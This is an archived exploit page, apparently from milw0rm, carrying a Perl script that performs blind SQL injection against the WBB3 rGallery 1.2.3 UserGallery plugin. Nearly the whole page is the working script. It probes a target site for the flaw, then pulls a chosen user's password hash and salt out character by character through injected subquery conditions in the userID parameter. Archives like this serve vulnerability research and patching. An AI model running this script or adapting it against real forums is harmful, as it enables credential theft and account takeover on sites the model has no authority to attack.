WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit

2009-03-23 15:33:08

#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;

print q {
#############################
## WBB3 Blind SQL-Injector ##
#### Exploit in rGallery ####
###### by Invisibility ######
#############################
\\\ Special greetz to #
// Katharsis/**/nobody #
\\\ Gunner/**/Cheese #
// Thx ;) #
#############################


};

if (@ARGV < 2) {
print "Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] \nExample: wbb3sploit.pl www.target.com 1 5\n";
exit;
}

my $url = shift;
my $uid = shift;
my $galid = shift;

my $prefix;

my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print "~ Is it vulnerable?...\n";

my $chreq = get("http://".$url."/index.php?page=RGalleryUserGallery&userID='");

if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) {

print "Nice, seems to be vulnerable!\n";

} else {

print "Seems to be patched, sorry\n";
exit;

}

print "~ Checking Prefix...\n";

if ($chreq =~ m/_wcf/i) {

print "~ Found Prefix '$1'\n";
$prefix = $1;

} else {
print "~ Can't find prefix, using 'wcf1_'\n";
$prefix = "wcf1_";
}

print "~ Exploiting...\n";
print "~^~ Hash: ";

my $counter = 1;
my $countersalt = 1;

while($counter < 40) {

my $false_result = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=-1");

foreach(@charset) {

my $ascode = ord($_);
my $result = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode."");

if (length($result) != 0) {
if ($result =~ "Keine") {
}
else{
print chr($ascode);
$counter++;
}
}
}
}
my $saltcheck = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0");
if($saltcheck =~ "Keine")
{
}
else
{
print "\n~^~ Salt: ";
while($countersalt < 40) {

my $false_result_salt = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=-1");

foreach(@charset) {

my $ascodesalt = ord($_);
my $resultsalt = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt."");

if (length($resultsalt) != 0) {
if ($resultsalt =~ "Keine") {
}
else{
print chr($ascodesalt);
$countersalt++;
}
}
}
}
}
print "\n~ Done! Exploit by Invisibility\n";

# EOF

#

# milw0rm.com [2009-03-23]

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.